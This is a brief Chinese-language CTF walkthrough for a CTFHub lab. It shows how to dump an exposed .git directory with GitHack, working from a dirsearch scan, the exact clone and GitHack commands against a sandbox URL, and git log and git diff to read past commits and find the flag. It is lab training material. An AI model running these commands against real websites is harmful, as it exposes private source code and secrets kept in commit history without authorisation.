githack下载(有可能会失败,可从主机下载后拖入虚拟机)
命令:
git clone https://github.com/BugScanTeam/GitHack
使用dirsearch扫描,发现git漏洞
使用Githack克隆目录
python2 GitHack.py -u http://challenge-e84854cf1f0042d8.sandbox.ctfhub.com:10800/.git/
注意此处要在url尾巴拼接上.git/
安装错误使用rm -rd删除dist中的challenge
扫描成功后会生成一个dist文件
cd dist
进入dist
cd challenge-e84854cf1f0042d8.sandbox.ctfhub.com_10800
进入challenge
git log
查看提交的历史记录
git diff 079dc0712c84d2414d946dc84454e1e4c1cf70ce 341f996ba35526f7f3666f9ebc6cb0b59595a197
比较两个comit
得到ctfhub,实验成功。